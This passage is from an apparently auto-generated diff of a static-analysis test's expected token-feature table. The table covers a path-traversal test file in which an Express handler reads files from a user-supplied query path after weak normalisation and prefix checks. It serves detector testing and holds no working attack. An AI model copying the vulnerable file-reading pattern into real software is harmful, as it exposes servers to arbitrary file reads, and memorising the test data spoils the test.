autogenerated/TaintedPath/normalizedPaths.js:106:14:106:49 | exceptional return of pathMod ... y.path) | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:106:14:106:49 | exceptional return of pathMod ... y.path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:106:14:106:49 | exceptional return of pathMod ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:106:14:106:49 | pathMod ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | | autogenerated/TaintedPath/normalizedPaths.js:106:14:106:49 | pathMod ... y.path) | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:106:14:106:49 | pathMod ... y.path) | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | | autogenerated/TaintedPath/normalizedPaths.js:106:14:106:49 | pathMod ... y.path) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:106:14:106:49 | pathMod ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:106:25:106:33 | normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:106:25:106:33 | normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:106:25:106:33 | normalize | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:106:25:106:33 | normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:106:25:106:33 | normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:106:35:106:37 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:106:35:106:37 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:106:35:106:37 | req | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:106:35:106:37 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:106:35:106:37 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:106:35:106:43 | req.query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:106:35:106:43 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:106:35:106:43 | req.query | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:106:35:106:43 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:106:35:106:43 | req.query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:106:35:106:48 | req.query.path | CalleeFlexibleAccessPath | pathModule.normalize | | autogenerated/TaintedPath/normalizedPaths.js:106:35:106:48 | req.query.path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:106:35:106:48 | req.query.path | calleeImports | path | @@ -8038,6 +72157,41 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:106:35:106:48 | req.query.path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:106:35:106:48 | req.query.path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:106:35:106:48 | req.query.path | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:106:39:106:43 | query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:106:39:106:43 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:106:39:106:43 | query | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:106:39:106:43 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:106:39:106:43 | query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:106:45:106:48 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:106:45:106:48 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:106:45:106:48 | path | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:106:45:106:48 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:106:45:106:48 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:109:7:109:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:109:7:109:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:109:7:109:10 | path | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:109:7:109:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:109:7:109:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:109:7:109:21 | path.startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:109:7:109:21 | path.startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:109:7:109:21 | path.startsWith | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:109:7:109:21 | path.startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:109:7:109:21 | path.startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:109:7:109:39 | exceptional return of path.st ... r/www") | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:109:7:109:39 | exceptional return of path.st ... r/www") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:109:7:109:39 | exceptional return of path.st ... r/www") | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:109:7:109:39 | exceptional return of path.st ... r/www") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:109:7:109:39 | exceptional return of path.st ... r/www") | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:109:7:109:39 | path.st ... r/www") | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:109:7:109:39 | path.st ... r/www") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:109:7:109:39 | path.st ... r/www") | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:109:7:109:39 | path.st ... r/www") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:109:7:109:39 | path.st ... r/www") | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:109:12:109:21 | startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:109:12:109:21 | startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:109:12:109:21 | startsWith | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:109:12:109:21 | startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:109:12:109:21 | startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:109:23:109:38 | "/home/user/www" | CalleeFlexibleAccessPath | path.startsWith | | autogenerated/TaintedPath/normalizedPaths.js:109:23:109:38 | "/home/user/www" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:109:23:109:38 | "/home/user/www" | calleeImports | path | @@ -8047,6 +72201,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:109:23:109:38 | "/home/user/www" | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:109:23:109:38 | "/home/user/www" | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:109:23:109:38 | "/home/user/www" | receiverName | path | +| autogenerated/TaintedPath/normalizedPaths.js:110:5:110:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:110:5:110:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:110:5:110:6 | fs | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:110:5:110:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:110:5:110:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:110:5:110:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:110:5:110:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:110:5:110:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:110:5:110:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:110:5:110:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:110:5:110:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:110:5:110:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:110:5:110:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:110:5:110:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:110:5:110:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:110:5:110:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:110:5:110:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:110:5:110:25 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:110:5:110:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:110:5:110:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:110:8:110:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:110:8:110:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:110:8:110:19 | readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:110:8:110:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:110:8:110:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:110:21:110:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:110:21:110:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:110:21:110:24 | path | calleeImports | fs | @@ -8056,6 +72235,96 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:110:21:110:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:110:21:110:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:110:21:110:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:112:7:112:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:112:7:112:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:112:7:112:10 | path | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:112:7:112:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:112:7:112:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:112:7:112:13 | path[0] | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:112:7:112:13 | path[0] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:112:7:112:13 | path[0] | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:112:7:112:13 | path[0] | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:112:7:112:13 | path[0] | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:112:7:112:21 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:112:7:112:21 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:112:7:112:21 | path | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:112:7:112:21 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:112:7:112:21 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:112:7:112:21 | path[0] !== "/" | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:112:7:112:21 | path[0] !== "/" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:112:7:112:21 | path[0] !== "/" | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:112:7:112:21 | path[0] !== "/" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:112:7:112:21 | path[0] !== "/" | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:112:7:112:40 | path[0] ... !== "." | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:112:7:112:40 | path[0] ... !== "." | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:112:7:112:40 | path[0] ... !== "." | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:112:7:112:40 | path[0] ... !== "." | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:112:7:112:40 | path[0] ... !== "." | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:112:12:112:12 | 0 | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:112:12:112:12 | 0 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:112:12:112:12 | 0 | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:112:12:112:12 | 0 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:112:12:112:12 | 0 | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:112:19:112:21 | "/" | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:112:19:112:21 | "/" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:112:19:112:21 | "/" | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:112:19:112:21 | "/" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:112:19:112:21 | "/" | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:112:26:112:29 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:112:26:112:29 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:112:26:112:29 | path | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:112:26:112:29 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:112:26:112:29 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:112:26:112:32 | path[0] | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:112:26:112:32 | path[0] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:112:26:112:32 | path[0] | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:112:26:112:32 | path[0] | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:112:26:112:32 | path[0] | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:112:26:112:40 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:112:26:112:40 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:112:26:112:40 | path | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:112:26:112:40 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:112:26:112:40 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:112:26:112:40 | path[0] !== "." | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:112:26:112:40 | path[0] !== "." | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:112:26:112:40 | path[0] !== "." | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:112:26:112:40 | path[0] !== "." | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:112:26:112:40 | path[0] !== "." | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:112:31:112:31 | 0 | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:112:31:112:31 | 0 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:112:31:112:31 | 0 | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:112:31:112:31 | 0 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:112:31:112:31 | 0 | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:112:38:112:40 | "." | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:112:38:112:40 | "." | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:112:38:112:40 | "." | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:112:38:112:40 | "." | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:112:38:112:40 | "." | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:113:5:113:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:113:5:113:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:113:5:113:6 | fs | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:113:5:113:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:113:5:113:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:113:5:113:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:113:5:113:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:113:5:113:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:113:5:113:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:113:5:113:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:113:5:113:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:113:5:113:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:113:5:113:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:113:5:113:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:113:5:113:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:113:5:113:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:113:5:113:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:113:5:113:25 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:113:5:113:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:113:5:113:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:113:8:113:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:113:8:113:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:113:8:113:19 | readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:113:8:113:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:113:8:113:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:113:21:113:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:113:21:113:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:113:21:113:24 | path | calleeImports | fs | @@ -8065,6 +72334,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:113:21:113:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:113:21:113:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:113:21:113:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:116:1:116:3 | app | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:116:1:116:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:116:1:116:3 | app | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:116:1:116:7 | app.get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:116:1:116:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:116:1:116:7 | app.get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:116:1:127:2 | app.get ... / OK\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:116:1:127:2 | app.get ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:116:1:127:2 | app.get ... / OK\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:116:1:127:2 | exceptional return of app.get ... / OK\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:116:1:127:2 | exceptional return of app.get ... / OK\\n}) | contextSurroundingFunctionParameters | | +| 